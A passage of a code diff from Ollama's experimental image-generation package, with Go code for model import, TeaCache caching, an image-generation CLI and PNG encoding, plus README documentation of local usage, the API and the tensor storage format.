"text_encoder/config.json",
"text_encoder/generation_config.json",
"transformer/config.json",
"vae/config.json",
"scheduler/scheduler_config.json",
"tokenizer/tokenizer.json",
"tokenizer/tokenizer_config.json",
"tokenizer/vocab.json",
}
for _, cfgPath := range configFiles {
fullPath := filepath.Join(modelDir, cfgPath)
if _, err := os.Stat(fullPath); os.IsNotExist(err) {
continue
}
fn(fmt.Sprintf("importing config %s", cfgPath))
var r io.Reader
// For model_index.json, normalize to Ollama format and add metadata
if cfgPath == "model_index.json" {
data, err := os.ReadFile(fullPath)
if err != nil {
return fmt.Errorf("failed to read %s: %w", cfgPath, err)
}
var cfg map[string]any
if err := json.Unmarshal(data, &cfg); err != nil {
return fmt.Errorf("failed to parse %s: %w", cfgPath, err)
}
// Rename _class_name to architecture, remove diffusers-specific fields
if className, ok := cfg["_class_name"]; ok {
cfg["architecture"] = className
delete(cfg, "_class_name")
}
delete(cfg, "_diffusers_version")
// Add parameter count (counted from tensor shapes during import)
cfg["parameter_count"] = totalParams
// Add quantization info - use quantize type if set, otherwise torch_dtype
if quantize != "" {
cfg["quantization"] = strings.ToUpper(quantize)
} else {
cfg["quantization"] = torchDtype
}
data, err = json.MarshalIndent(cfg, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal %s: %w", cfgPath, err)
}
r = bytes.NewReader(data)
} else {
f, err := os.Open(fullPath)
if err != nil {
return fmt.Errorf("failed to open %s: %w", cfgPath, err)
}
defer f.Close()
r = f
}
layer, err := createLayer(r, "application/vnd.ollama.image.json", cfgPath)
if err != nil {
return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
}
// Use model_index.json as the config layer
if cfgPath == "model_index.json" {
configLayer = layer
}
layers = append(layers, layer)
}
if configLayer.Digest == "" {
return fmt.Errorf("model_index.json not found in %s", modelDir)
}
fn(fmt.Sprintf("writing manifest for %s", modelName))
if err := writeManifest(modelName, configLayer, layers); err != nil {
return fmt.Errorf("failed to write manifest: %w", err)
}
fn(fmt.Sprintf("successfully imported %s with %d layers", modelName, len(layers)))
return nil
}
// canQuantizeShape returns true if a tensor shape is compatible with MLX quantization.
// MLX requires the last dimension to be divisible by the group size (32).
func canQuantizeShape(shape []int32) bool {
if len(shape) < 2 {
return false
}
return shape[len(shape)-1]%32 == 0
}

View File

@@ -1,61 +1,250 @@
# imagegen
# Image Generation in Ollama (Experimental)
This is a package that uses MLX to run image generation models, ahead of being integrated into Ollama's primary runner.
in `CMakeLists.txt` and rebuild.
Generate images from text prompts using local AI models.
### 1. Download a Model
Download Llama 3.1 8B (or any compatible model) in safetensors format:
## Quick Start
```bash
mkdir -p ./weights
# Example using huggingface-cli
hf download meta-llama/Llama-3.1-8B --local-dir ./weights/Llama-3.1-8B
hf download openai/gpt-oss-20b --local-dir ./weights/gpt-oss-20b
# Run with a prompt
ollama run z-image "a sunset over mountains"
Generating: step 30/30
Image saved to: /tmp/ollama-image-1704067200.png
```
### 2. Run Inference
On macOS, the generated image will automatically open in Preview.
## Supported Models
| Model | VRAM Required | Notes |
|-------|---------------|-------|
| z-image | ~12GB | Based on Flux architecture |
## CLI Usage
```bash
# Build
go build ./cmd/engine
# Generate an image
ollama run z-image "a cat playing piano"
# Text generation
./engine -model ./weights/Llama-3.1-8B -prompt "Hello, world!" -max-tokens 250
# Check if model is running
ollama ps
# Qwen-Image 2512 (text-to-image)
./engine -qwen-image -model ./weights/Qwen-Image-2512 -prompt "A mountain landscape at sunset" \
-width 1024 -height 1024 -steps 20 -seed 42 -output landscape.png
# Qwen-Image Edit (experimental) - 8 steps for speed, but model recommends 50
./engine -qwen-image-edit -model ./weights/Qwen-Image-Edit-2511 \
-input-image input.png -prompt "Make it winter" -negative-prompt " " -cfg-scale 4.0 \
-steps 8 -seed 42 -output edited.png
# Stop the model
ollama stop z-image
```
## Memory Management
## API
MLX Python/C++ uses scope-based memory management - arrays are freed when they go out of scope. Go's garbage collector is non-deterministic, so we can't rely on finalizers to free GPU memory promptly.
### OpenAI-Compatible Endpoint
Instead, arrays are automatically tracked and freed on `Eval()`:
```go
// All arrays are automatically tracked when created
x := mlx.Add(a, b)
y := mlx.Matmul(x, w)
// Eval frees non-kept arrays, evaluates outputs (auto-kept)
mlx.Eval(y)
// After copying to CPU, free the array
data := y.Data()
y.Free()
```bash
POST /v1/images/generations
```
Key points:
**Request:**
```json
{
"model": "z-image",
"prompt": "a sunset over mountains",
"size": "1024x1024",
"response_format": "b64_json"
}
```
**Response:**
```json
{
"created": 1704067200,
"data": [
{
"b64_json": "iVBORw0KGgo..."
}
]
}
```
### Example: cURL
```bash
curl http://localhost:11434/v1/images/generations \
-H "Content-Type: application/json" \
-d '{
"model": "z-image",
"prompt": "a white cat",
"size": "1024x1024"
}'
```
### Example: Save to File
```bash
curl -s http://localhost:11434/v1/images/generations \
-H "Content-Type: application/json" \
-d '{
"model": "z-image",
"prompt": "a white cat",
"size": "1024x1024"
}' | jq -r '.data[0].b64_json' | base64 -d > image.png
```
### Streaming Progress
Enable streaming to receive progress updates via SSE:
```bash
curl http://localhost:11434/v1/images/generations \
-H "Content-Type: application/json" \
-d '{"model": "z-image", "prompt": "a sunset", "stream": true}'
```
Events:
```
event: progress
data: {"step": 1, "total": 30}
event: progress
data: {"step": 2, "total": 30}
...
event: done
data: {"created": 1704067200, "data": [{"b64_json": "..."}]}
```
## Parameters
| Parameter | Type | Default | Description |
|-----------|------|---------|-------------|
| model | string | required | Model name |
| prompt | string | required | Text description of image |
| size | string | "1024x1024" | Image dimensions (WxH) |
| n | int | 1 | Number of images (currently only 1 supported) |
| response_format | string | "b64_json" | "b64_json" or "url" |
| stream | bool | false | Enable progress streaming |
## Requirements
- macOS with Apple Silicon (M1/M2/M3/M4)
- CUDA: tested on CUDA 12 Blackwell, more testing coming soon
- Sufficient VRAM (see model table above)
- Ollama built with MLX support
## Limitations
- macOS only (uses MLX backend)
- Single image per request
- Fixed step count (30 steps)
- Modelfiles not yet supported (use `ollama create` from model directory)
---
# Tensor Model Storage Format
Tensor models store each tensor as a separate blob with metadata in the manifest. This enables faster downloads (parallel fetching) and deduplication (shared tensors are stored once).
## Manifest Structure
The manifest follows the standard ollama format with tensor-specific layer metadata:
```json
{
"schemaVersion": 2,
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
"config": { "digest": "sha256:...", "size": 1234 },
"layers": [
{
"mediaType": "application/vnd.ollama.image.tensor",
"digest": "sha256:25b36eed...",
"size": 49807448,
"name": "text_encoder/model.layers.0.mlp.down_proj.weight",
"dtype": "BF16",
"shape": [2560, 9728]
},
{
"mediaType": "application/vnd.ollama.image.json",
"digest": "sha256:abc123...",
"size": 512,
"name": "text_encoder/config.json"
}
]
}
```
Each tensor layer includes:
- `name`: Path-style tensor name (e.g., `text_encoder/model.layers.0.mlp.down_proj.weight`)
- `dtype`: Data type (BF16, F32, etc.)
- `shape`: Tensor dimensions
Config layers use the same path-style naming (e.g., `tokenizer/tokenizer.json`).
## Blob Format
Each tensor blob is a minimal safetensors file:
```
[8 bytes: header size (uint64 LE)]
[~80 bytes: JSON header, padded to 8-byte alignment]
[N bytes: raw tensor data]
```
Header contains a single tensor named `"data"`:
```json
{"data":{"dtype":"BF16","shape":[2560,9728],"data_offsets":[0,49807360]}}
```
## Why Include the Header?
The ~88 byte safetensors header enables MLX's native `mlx_load_safetensors` function, which:
1. **Uses mmap** - Maps file directly into memory, no copies
2. **Zero-copy to GPU** - MLX reads directly from mapped pages
3. **No custom code** - Standard MLX API, battle-tested
Without the header, we'd need custom C++ code to create MLX arrays from raw mmap'd data. MLX's public API doesn't expose this - it always copies when creating arrays from external pointers.
The overhead is negligible: 88 bytes per tensor = ~100KB total for a 13GB model (0.0007%).
## Why Per-Tensor Blobs?
**Deduplication**: Blobs are content-addressed by SHA256. If two models share identical tensors (same weights, dtype, shape), they share the same blob file.
Example: Model A and Model B both use the same text encoder. The text encoder's 400 tensors are stored once, referenced by both manifests.
```
~/.ollama/models/
blobs/
sha256-25b36eed... <- shared by both models
sha256-abc123...
manifests/
library/model-a/latest <- references sha256-25b36eed
library/model-b/latest <- references sha256-25b36eed
```
## Import Flow
```
cd ./weights/Z-Image-Turbo
ollama create z-image
1. Scan component directories (text_encoder/, transformer/, vae/)
2. For each .safetensors file:
- Extract individual tensors
- Wrap each in minimal safetensors format (88B header + data)
- Write to blob store (SHA256 content-addressed)
- Add layer entry to manifest with path-style name
3. Copy config files (*.json) as config layers
4. Write manifest
```
## FP8 Quantization
Z-Image supports FP8 quantization to reduce memory usage by ~50% while maintaining image quality.
### Usage
```bash
cd ./weights/Z-Image-Turbo
ollama create z-image-fp8 --quantize fp8
```
This quantizes weights during import. The resulting model will be ~15GB instead of ~31GB.
- All created arrays are automatically tracked
- `mlx.Eval(outputs...)` frees non-kept arrays, evaluates outputs (outputs auto-kept)
- `mlx.Keep(arrays...)` marks arrays to survive multiple Eval cycles (for weights, caches)
- Call `.Free()` when done with an array

197
x/imagegen/cache/teacache.go vendored Normal file
View File

@@ -0,0 +1,197 @@
//go:build mlx
// Package cache provides caching mechanisms for diffusion model inference.
package cache
import (
"github.com/ollama/ollama/x/imagegen/mlx"
)
// TeaCache implements Timestep Embedding Aware Caching for diffusion models.
// It caches the transformer output and reuses it when timestep values
// are similar between consecutive steps.
//
// For CFG (classifier-free guidance), it caches pos and neg predictions
// separately and always computes CFG fresh to avoid error amplification.
//
// Reference: "Timestep Embedding Tells: It's Time to Cache for Video Diffusion Model"
// https://github.com/ali-vilab/TeaCache
type TeaCache struct {
// Cached transformer output from last computed step (non-CFG mode)
cachedOutput *mlx.Array
// Cached CFG outputs (pos and neg separately)
cachedPosOutput *mlx.Array
cachedNegOutput *mlx.Array
// Previous timestep value for difference calculation
prevTimestep float32
// Accumulated difference for rescaling
accumulatedDiff float32
// Configuration
threshold float32 // Threshold for recomputation decision
rescaleFactor float32 // Model-specific rescaling factor
skipEarlySteps int // Number of early steps to never cache
// Statistics
cacheHits int
cacheMisses int
}
// TeaCacheConfig holds configuration for TeaCache.
type TeaCacheConfig struct {
// Threshold for recomputation. Lower = more cache hits, potential quality loss.
// Recommended: 0.05-0.15 for image models
Threshold float32
// Rescale factor to adjust timestep embedding differences.
// Model-specific, typically 1.0-2.0
RescaleFactor float32
// SkipEarlySteps: number of early steps to always compute (never cache).
// Set to 2-3 for CFG mode to preserve structure. 0 = no skipping.
SkipEarlySteps int
}
// DefaultTeaCacheConfig returns default configuration for TeaCache.
func DefaultTeaCacheConfig() *TeaCacheConfig {
return &TeaCacheConfig{
Threshold: 0.1,
RescaleFactor: 1.0,
}
}
// NewTeaCache creates a new TeaCache instance.
func NewTeaCache(cfg *TeaCacheConfig) *TeaCache {
if cfg == nil {
cfg = DefaultTeaCacheConfig()
}
return &TeaCache{
threshold: cfg.Threshold,
rescaleFactor: cfg.RescaleFactor,
skipEarlySteps: cfg.SkipEarlySteps,
}
}
// ShouldCompute determines if we should compute the full forward pass
// or reuse the cached output based on timestep similarity.
//
// Algorithm:
// 1. First step always computes
// 2. Subsequent steps compare |currTimestep - prevTimestep| * rescaleFactor
// 3. If accumulated difference > threshold, compute new output
// 4. Otherwise, reuse cached output
func (tc *TeaCache) ShouldCompute(step int, timestep float32) bool {
// Always compute early steps (critical for structure)
// Check both regular cache and CFG cache
hasCachedOutput := tc.cachedOutput != nil || tc.HasCFGCache()
if step < tc.skipEarlySteps || step == 0 || !hasCachedOutput {
return true
}
// Compute absolute difference between current and previous timestep
diff := timestep - tc.prevTimestep
if diff < 0 {
diff = -diff
}
// Apply rescaling factor
scaledDiff := diff * tc.rescaleFactor
// Accumulate difference (helps track drift over multiple cached steps)
tc.accumulatedDiff += scaledDiff
// Decision based on accumulated difference
if tc.accumulatedDiff > tc.threshold {
tc.accumulatedDiff = 0 // Reset accumulator
return true
}
return false
}
// UpdateCache stores the computed output for potential reuse (non-CFG mode).
func (tc *TeaCache) UpdateCache(output *mlx.Array, timestep float32) {
// Free previous cached output
if tc.cachedOutput != nil {
tc.cachedOutput.Free()
}
// Store new cached values
tc.cachedOutput = output
tc.prevTimestep = timestep
tc.cacheMisses++
}
// UpdateCFGCache stores pos and neg outputs separately for CFG mode.
// This allows CFG to be computed fresh each step, avoiding error amplification.
func (tc *TeaCache) UpdateCFGCache(posOutput, negOutput *mlx.Array, timestep float32) {
// Free previous cached outputs
if tc.cachedPosOutput != nil {
tc.cachedPosOutput.Free()
}
if tc.cachedNegOutput != nil {
tc.cachedNegOutput.Free()
}
// Store new cached values
tc.cachedPosOutput = posOutput
tc.cachedNegOutput = negOutput
tc.prevTimestep = timestep
tc.cacheMisses++
}
// GetCached returns the cached output (non-CFG mode).
func (tc *TeaCache) GetCached() *mlx.Array {
tc.cacheHits++
return tc.cachedOutput
}
// GetCFGCached returns cached pos and neg outputs for CFG mode.
func (tc *TeaCache) GetCFGCached() (pos, neg *mlx.Array) {
tc.cacheHits++
return tc.cachedPosOutput, tc.cachedNegOutput
}
// HasCFGCache returns true if CFG cache is available.
func (tc *TeaCache) HasCFGCache() bool {
return tc.cachedPosOutput != nil && tc.cachedNegOutput != nil
}
// Arrays returns all arrays that should be kept alive.
func (tc *TeaCache) Arrays() []*mlx.Array {
var arrays []*mlx.Array
if tc.cachedOutput != nil {
arrays = append(arrays, tc.cachedOutput)
}
if tc.cachedPosOutput != nil {
arrays = append(arrays, tc.cachedPosOutput)
}
if tc.cachedNegOutput != nil {
arrays = append(arrays, tc.cachedNegOutput)
}
return arrays
}
// Stats returns cache hit/miss statistics.
func (tc *TeaCache) Stats() (hits, misses int) {
return tc.cacheHits, tc.cacheMisses
}
// Free releases all cached arrays.
func (tc *TeaCache) Free() {
if tc.cachedOutput != nil {
tc.cachedOutput.Free()
tc.cachedOutput = nil
}
if tc.cachedPosOutput != nil {
tc.cachedPosOutput.Free()
tc.cachedPosOutput = nil
}
if tc.cachedNegOutput != nil {
tc.cachedNegOutput.Free()
tc.cachedNegOutput = nil
}
}

450
x/imagegen/cli.go Normal file
View File

@@ -0,0 +1,450 @@
// cli.go provides CLI commands for image generation models.
//
// TODO (jmorganca): Integrate these commands into cmd/cmd.go when stable.
// Currently these are separate to keep experimental code isolated.
package imagegen
import (
"encoding/base64"
"errors"
"fmt"
"io"
"os"
"strconv"
"strings"
"time"
"github.com/spf13/cobra"
"github.com/ollama/ollama/api"
"github.com/ollama/ollama/envconfig"
"github.com/ollama/ollama/progress"
"github.com/ollama/ollama/readline"
)
// ImageGenOptions holds options for image generation.
// These can be set via environment variables or interactive commands.
type ImageGenOptions struct {
Width int
Height int
Steps int
Seed int
NegativePrompt string
}
// DefaultOptions returns the default image generation options.
func DefaultOptions() ImageGenOptions {
return ImageGenOptions{
Width: 1024,
Height: 1024,
Steps: 0, // 0 means model default
Seed: 0, // 0 means random
}
}
// RegisterFlags adds image generation flags to the given command.
// Flags are hidden since they only apply to image generation models.
func RegisterFlags(cmd *cobra.Command) {
cmd.Flags().Int("width", 1024, "Image width")
cmd.Flags().Int("height", 1024, "Image height")
cmd.Flags().Int("steps", 0, "Denoising steps (0 = model default)")
cmd.Flags().Int("seed", 0, "Random seed (0 for random)")
cmd.Flags().String("negative", "", "Negative prompt")
cmd.Flags().MarkHidden("width")
cmd.Flags().MarkHidden("height")
cmd.Flags().MarkHidden("steps")
cmd.Flags().MarkHidden("seed")
cmd.Flags().MarkHidden("negative")
}
// RunCLI handles the CLI for image generation models.
// Returns true if it handled the request, false if the caller should continue with normal flow.
// Supports flags: --width, --height, --steps, --seed, --negative
func RunCLI(cmd *cobra.Command, name string, prompt string, interactive bool, keepAlive *api.Duration) error {
// Get options from flags (with env var defaults)
opts := DefaultOptions()
if cmd != nil && cmd.Flags() != nil {
if v, err := cmd.Flags().GetInt("width"); err == nil && v > 0 {
opts.Width = v
}
if v, err := cmd.Flags().GetInt("height"); err == nil && v > 0 {
opts.Height = v
}
if v, err := cmd.Flags().GetInt("steps"); err == nil && v > 0 {
opts.Steps = v
}
if v, err := cmd.Flags().GetInt("seed"); err == nil && v != 0 {
opts.Seed = v
}
if v, err := cmd.Flags().GetString("negative"); err == nil && v != "" {
opts.NegativePrompt = v
}
}
if interactive {
return runInteractive(cmd, name, keepAlive, opts)
}
// One-shot generation
return generateImageWithOptions(cmd, name, prompt, keepAlive, opts)
}
// generateImageWithOptions generates an image with the given options.
func generateImageWithOptions(cmd *cobra.Command, modelName, prompt string, keepAlive *api.Duration, opts ImageGenOptions) error {
client, err := api.ClientFromEnvironment()
if err != nil {
return err
}
req := &api.GenerateRequest{
Model: modelName,
Prompt: prompt,
Width: int32(opts.Width),
Height: int32(opts.Height),
Steps: int32(opts.Steps),
}
if keepAlive != nil {
req.KeepAlive = keepAlive
}
// Show loading spinner until generation starts
p := progress.NewProgress(os.Stderr)
spinner := progress.NewSpinner("")
p.Add("", spinner)
var stepBar *progress.StepBar
var imageBase64 string
err = client.XGenerate(cmd.Context(), req, func(resp api.GenerateResponse) error {
// Handle progress updates using structured fields
if resp.Total > 0 && resp.Completed > 0 {
if stepBar == nil {
spinner.Stop()
stepBar = progress.NewStepBar("Generating", int(resp.Total))
p.Add("", stepBar)
}
stepBar.Set(int(resp.Completed))
}
// Handle final response with image data
if resp.Done && len(resp.Images) > 0 {
imageBase64 = resp.Images[0]
}
return nil
})
p.Stop()
if err != nil {
return err
}
if imageBase64 != "" {
// Decode base64 and save to CWD
imageData, err := base64.StdEncoding.DecodeString(imageBase64)
if err != nil {
return fmt.Errorf("failed to decode image: %w", err)
}
// Create filename from prompt
safeName := sanitizeFilename(prompt)
if len(safeName) > 50 {
safeName = safeName[:50]
}
timestamp := time.Now().Format("20060102-150405")
filename := fmt.Sprintf("%s-%s.png", safeName, timestamp)
if err := os.WriteFile(filename, imageData, 0o644); err != nil {
return fmt.Errorf("failed to save image: %w", err)
}
displayImageInTerminal(filename)
fmt.Printf("Image saved to: %s\n", filename)
}
return nil
}
// runInteractive runs an interactive REPL for image generation.
func runInteractive(cmd *cobra.Command, modelName string, keepAlive *api.Duration, opts ImageGenOptions) error {
client, err := api.ClientFromEnvironment()
if err != nil {
return err
}
scanner, err := readline.New(readline.Prompt{
Prompt: ">>> ",
Placeholder: "Describe an image to generate (/help for commands)",
})
if err != nil {
return err
}
if envconfig.NoHistory() {
scanner.HistoryDisable()
}
for {
line, err := scanner.Readline()
switch {
case errors.Is(err, io.EOF):
fmt.Println()
return nil
case errors.Is(err, readline.ErrInterrupt):
if line == "" {
fmt.Println("\nUse Ctrl + d or /bye to exit.")
}
continue
case err != nil:
return err
}
line = strings.TrimSpace(line)
if line == "" {
continue
}
// Handle commands
switch {
case strings.HasPrefix(line, "/bye"):
return nil
case strings.HasPrefix(line, "/?"), strings.HasPrefix(line, "/help"):
printInteractiveHelp(opts)
continue
case strings.HasPrefix(line, "/set "):
if err := handleSetCommand(line[5:], &opts); err != nil {
fmt.Fprintf(os.Stderr, "Error: %v\n", err)
}
continue
case strings.HasPrefix(line, "/show"):
printCurrentSettings(opts)
continue
case strings.HasPrefix(line, "/"):
fmt.Fprintf(os.Stderr, "Unknown command: %s (try /help)\n", line)
continue
}
// Generate image with current options
req := &api.GenerateRequest{
Model: modelName,
Prompt: line,
Width: int32(opts.Width),
Height: int32(opts.Height),
Steps: int32(opts.Steps),
}
if keepAlive != nil {
req.KeepAlive = keepAlive
}
// Show loading spinner until generation starts
p := progress.NewProgress(os.Stderr)
spinner := progress.NewSpinner("")
p.Add("", spinner)
var stepBar *progress.StepBar
var imageBase64 string
err = client.XGenerate(cmd.Context(), req, func(resp api.GenerateResponse) error {
// Handle progress updates using structured fields
if resp.Total > 0 && resp.Completed > 0 {
if stepBar == nil {
spinner.Stop()
stepBar = progress.NewStepBar("Generating", int(resp.Total))
p.Add("", stepBar)
}
stepBar.Set(int(resp.Completed))
}
// Handle final response with image data
if resp.Done && len(resp.Images) > 0 {
imageBase64 = resp.Images[0]
}
return nil
})
p.Stop()
if err != nil {
fmt.Fprintf(os.Stderr, "Error: %v\n", err)
continue
}
// Save image to current directory with descriptive name
if imageBase64 != "" {
// Decode base64 image data
imageData, err := base64.StdEncoding.DecodeString(imageBase64)
if err != nil {
fmt.Fprintf(os.Stderr, "Error decoding image: %v\n", err)
continue
}
// Create filename from prompt (sanitized)
safeName := sanitizeFilename(line)
if len(safeName) > 50 {
safeName = safeName[:50]
}
timestamp := time.Now().Format("20060102-150405")
filename := fmt.Sprintf("%s-%s.png", safeName, timestamp)
if err := os.WriteFile(filename, imageData, 0o644); err != nil {
fmt.Fprintf(os.Stderr, "Error saving image: %v\n", err)
continue
}
displayImageInTerminal(filename)
fmt.Printf("Image saved to: %s\n", filename)
}
fmt.Println()
}
}
// sanitizeFilename removes characters that aren't safe for filenames.
func sanitizeFilename(s string) string {
s = strings.ToLower(s)
s = strings.ReplaceAll(s, " ", "-")
// Remove any character that's not alphanumeric or hyphen
var result strings.Builder
for _, r := range s {
if (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-' {
result.WriteRune(r)
}
}
return result.String()
}
// printInteractiveHelp prints help for interactive mode commands.
func printInteractiveHelp(opts ImageGenOptions) {
fmt.Fprintln(os.Stderr, "Commands:")
fmt.Fprintln(os.Stderr, " /set width <n> Set image width (current:", opts.Width, ")")
fmt.Fprintln(os.Stderr, " /set height <n> Set image height (current:", opts.Height, ")")
fmt.Fprintln(os.Stderr, " /set steps <n> Set denoising steps (current:", opts.Steps, ")")
fmt.Fprintln(os.Stderr, " /set seed <n> Set random seed (current:", opts.Seed, ", 0=random)")
fmt.Fprintln(os.Stderr, " /set negative <s> Set negative prompt")
fmt.Fprintln(os.Stderr, " /show Show current settings")
fmt.Fprintln(os.Stderr, " /bye Exit")
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, "Or type a prompt to generate an image.")
fmt.Fprintln(os.Stderr)
}
// printCurrentSettings prints the current image generation settings.
func printCurrentSettings(opts ImageGenOptions) {
fmt.Fprintf(os.Stderr, "Current settings:\n")
fmt.Fprintf(os.Stderr, " width: %d\n", opts.Width)
fmt.Fprintf(os.Stderr, " height: %d\n", opts.Height)
fmt.Fprintf(os.Stderr, " steps: %d\n", opts.Steps)
fmt.Fprintf(os.Stderr, " seed: %d (0=random)\n", opts.Seed)
if opts.NegativePrompt != "" {
fmt.Fprintf(os.Stderr, " negative: %s\n", opts.NegativePrompt)
}
fmt.Fprintln(os.Stderr)
}
// handleSetCommand handles /set commands to change options.
func handleSetCommand(args string, opts *ImageGenOptions) error {
parts := strings.SplitN(args, " ", 2)
if len(parts) < 2 {
return fmt.Errorf("usage: /set <option> <value>")
}
key := strings.ToLower(parts[0])
value := strings.TrimSpace(parts[1])
switch key {
case "width", "w":
v, err := strconv.Atoi(value)
if err != nil || v <= 0 {
return fmt.Errorf("width must be a positive integer")
}
opts.Width = v
fmt.Fprintf(os.Stderr, "Set width to %d\n", v)
case "height", "h":
v, err := strconv.Atoi(value)
if err != nil || v <= 0 {
return fmt.Errorf("height must be a positive integer")
}
opts.Height = v
fmt.Fprintf(os.Stderr, "Set height to %d\n", v)
case "steps", "s":
v, err := strconv.Atoi(value)
if err != nil || v <= 0 {
return fmt.Errorf("steps must be a positive integer")
}
opts.Steps = v
fmt.Fprintf(os.Stderr, "Set steps to %d\n", v)
case "seed":
v, err := strconv.Atoi(value)
if err != nil {
return fmt.Errorf("seed must be an integer")
}
opts.Seed = v
fmt.Fprintf(os.Stderr, "Set seed to %d\n", v)
case "negative", "neg", "n":
opts.NegativePrompt = value
if value == "" {
fmt.Fprintln(os.Stderr, "Cleared negative prompt")
} else {
fmt.Fprintf(os.Stderr, "Set negative prompt to: %s\n", value)
}
default:
return fmt.Errorf("unknown option: %s (try /help)", key)
}
return nil
}
// displayImageInTerminal attempts to render an image inline in the terminal.
// Supports iTerm2, Kitty, WezTerm, Ghostty, and other terminals with inline image support.
// Returns true if the image was displayed, false otherwise.
func displayImageInTerminal(imagePath string) bool {
// Check if terminal supports inline images
termProgram := os.Getenv("TERM_PROGRAM")
kittyWindowID := os.Getenv("KITTY_WINDOW_ID")
weztermPane := os.Getenv("WEZTERM_PANE")
ghostty := os.Getenv("GHOSTTY_RESOURCES_DIR")
// Read the image file
data, err := os.ReadFile(imagePath)
if err != nil {
return false
}
encoded := base64.StdEncoding.EncodeToString(data)
switch {
case termProgram == "iTerm.app" || termProgram == "WezTerm" || weztermPane != "":
// iTerm2/WezTerm inline image protocol
// ESC ] 1337 ; File = [arguments] : base64 BEL
fmt.Printf("\033]1337;File=inline=1;preserveAspectRatio=1:%s\a\n", encoded)
return true
case kittyWindowID != "" || ghostty != "" || termProgram == "ghostty":
// Kitty graphics protocol (also used by Ghostty)
// Send in chunks for large images
const chunkSize = 4096
for i := 0; i < len(encoded); i += chunkSize {
end := min(i+chunkSize, len(encoded))
chunk := encoded[i:end]
if i == 0 {
// First chunk: a=T (transmit), f=100 (PNG), m=1 (more chunks follow) or m=0 (last chunk)
more := 1
if end >= len(encoded) {
more = 0
}
fmt.Printf("\033_Ga=T,f=100,m=%d;%s\033\\", more, chunk)
} else if end >= len(encoded) {
// Last chunk
fmt.Printf("\033_Gm=0;%s\033\\", chunk)
} else {
// Middle chunk
fmt.Printf("\033_Gm=1;%s\033\\", chunk)
}
}
fmt.Println()
return true
default:
return false
}
}

View File

@@ -0,0 +1,35 @@
# MLX Engine
Experimental MLX backend for running models on Apple Silicon and CUDA.
## Build
```bash
go build -tags mlx -o engine ./x/imagegen/cmd/engine
```
## Text Generation
```bash
./engine -model /path/to/model -prompt "Hello" -max-tokens 100
```
Options:
- `-temperature` - sampling temperature (default 0.7)
- `-top-p` - nucleus sampling (default 0.9)
- `-top-k` - top-k sampling (default 40)
Supports: Llama, Gemma3, GPT-OSS
## Image Generation
```bash
./engine -zimage -model /path/to/z-image -prompt "a cat" -output cat.png
```
Options:
- `-width`, `-height` - image dimensions (default 1024x1024)
- `-steps` - denoising steps (default 9)
- `-seed` - random seed (default 42)

View File

@@ -12,6 +12,7 @@ import (
"path/filepath"
"runtime/pprof"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/models/gemma3"
"github.com/ollama/ollama/x/imagegen/models/gpt_oss"
@@ -48,7 +49,7 @@ func main() {
// Image generation params
width := flag.Int("width", 1024, "Image width")
height := flag.Int("height", 1024, "Image height")
steps := flag.Int("steps", 9, "Denoising steps")
steps := flag.Int("steps", 0, "Denoising steps (0 = model default)")
seed := flag.Int64("seed", 42, "Random seed")
out := flag.String("output", "output.png", "Output path")
@@ -67,6 +68,9 @@ func main() {
flag.Var(&inputImages, "input-image", "Input image for image editing (can be specified multiple times)")
negativePrompt := flag.String("negative-prompt", "", "Negative prompt for CFG (empty = no CFG, matching Python)")
cfgScale := flag.Float64("cfg-scale", 4.0, "CFG scale for image editing")
teaCache := flag.Bool("teacache", false, "Enable TeaCache for faster inference")
teaCacheThreshold := flag.Float64("teacache-threshold", 0.1, "TeaCache threshold (lower = more aggressive caching)")
fusedQKV := flag.Bool("fused-qkv", false, "Enable fused QKV projection for faster attention")
flag.Parse()
@@ -98,14 +102,18 @@ func main() {
log.Fatal(loadErr)
}
var img *mlx.Array
img, err = m.GenerateFromConfig(&zimage.GenerateConfig{
Prompt: *prompt,
Width: int32(*width),
Height: int32(*height),
Steps: *steps,
Seed: *seed,
CapturePath: *gpuCapture,
LayerCache: *layerCache,
img, err = m.GenerateFromConfig(context.Background(), &zimage.GenerateConfig{
Prompt: *prompt,
NegativePrompt: *negativePrompt,
CFGScale: float32(*cfgScale),
Width: int32(*width),
Height: int32(*height),
Steps: *steps,
Seed: *seed,
CapturePath: *gpuCapture,
TeaCache: *teaCache,
TeaCacheThreshold: float32(*teaCacheThreshold),
FusedQKV: *fusedQKV,
})
if err == nil {
err = saveImageArray(img, *out)

110
x/imagegen/image.go Normal file
View File

@@ -0,0 +1,110 @@
//go:build mlx
package imagegen
import (
"bytes"
"encoding/base64"
"fmt"
"image"
"image/png"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// SaveImage saves an MLX array as a PNG image file.
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
func SaveImage(arr *mlx.Array, path string) error {
img, err := ArrayToImage(arr)
if err != nil {
return err
}
if filepath.Ext(path) != ".png" {
path = path + ".png"
}
f, err := os.Create(path)
if err != nil {
return err
}
defer f.Close()
return png.Encode(f, img)
}
// EncodeImageBase64 encodes an MLX array as a base64-encoded PNG.
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
func EncodeImageBase64(arr *mlx.Array) (string, error) {
img, err := ArrayToImage(arr)
if err != nil {
return "", err
}
var buf bytes.Buffer
if err := png.Encode(&buf, img); err != nil {
return "", err
}
return base64.StdEncoding.EncodeToString(buf.Bytes()), nil
}
// ArrayToImage converts an MLX array to a Go image.RGBA.
// Expected format: [B, C, H, W] with values in [0, 1] range and C=3 (RGB).
func ArrayToImage(arr *mlx.Array) (*image.RGBA, error) {
shape := arr.Shape()
if len(shape) != 4 {
return nil, fmt.Errorf("expected 4D array [B, C, H, W], got %v", shape)
}
// Transform to [H, W, C] for image conversion
// Free intermediate arrays to avoid memory leak
squeezed := mlx.Squeeze(arr, 0)
transposed := mlx.Transpose(squeezed, 1, 2, 0)
squeezed.Free()
img := mlx.Contiguous(transposed)
transposed.Free()
mlx.Eval(img)
imgShape := img.Shape()
H := int(imgShape[0])
W := int(imgShape[1])
C := int(imgShape[2])
if C != 3 {
img.Free()
return nil, fmt.Errorf("expected 3 channels (RGB), got %d", C)
}
// Copy to CPU and free GPU memory
data := img.Data()
img.Free()
// Write directly to Pix slice (faster than SetRGBA)
